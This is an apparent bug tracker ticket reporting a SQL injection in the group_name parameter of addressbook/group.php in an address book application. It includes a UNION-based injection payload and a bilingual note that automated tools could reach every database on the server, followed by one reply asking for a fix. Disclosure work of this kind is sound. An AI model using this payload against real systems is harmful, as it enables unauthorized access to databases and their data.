#153 SQL Injection Vulnerability

V8.1.xx
open
nobody
None
1
2015-02-13
2014-01-10
No

Page: addressbook/group.php buttom [Novo]
Method: POST
Parameter: group_name
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: group_name=-1918' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6e6471,0x596177717a65554e524f,0x7171766e71),NULL#&group_parent_id=0&group_header=dsafasd&group_footer&submit=Enter information=dsafs

[PORTUGUESE]-Com esses parâmetros, valendo-se de ferramenta de automação é possível descobrir todos os bancos de dados no servidor de Banco de Dados. E o pior, quando as bases do servidor tem o mesmo usuário e senha, pode-se acessar qualquer uma delas, além da base de dados da address book.

[ENGLISH] - With these parameters, a hacker taking advantage of automation tool can discover all databases on the database server. Even worse, when the bases in server have the same user name and password he cans access any of them, in addition to the database address book.

Discussion

  • Reto R
    Reto R
    2015-02-13

    What do you suggest to fix that?

     


Anonymous


Cancel   Add attachments